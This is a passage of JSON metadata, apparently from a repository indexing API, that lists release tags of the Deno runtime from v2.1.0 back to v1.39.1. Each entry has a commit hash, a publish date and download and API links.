purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/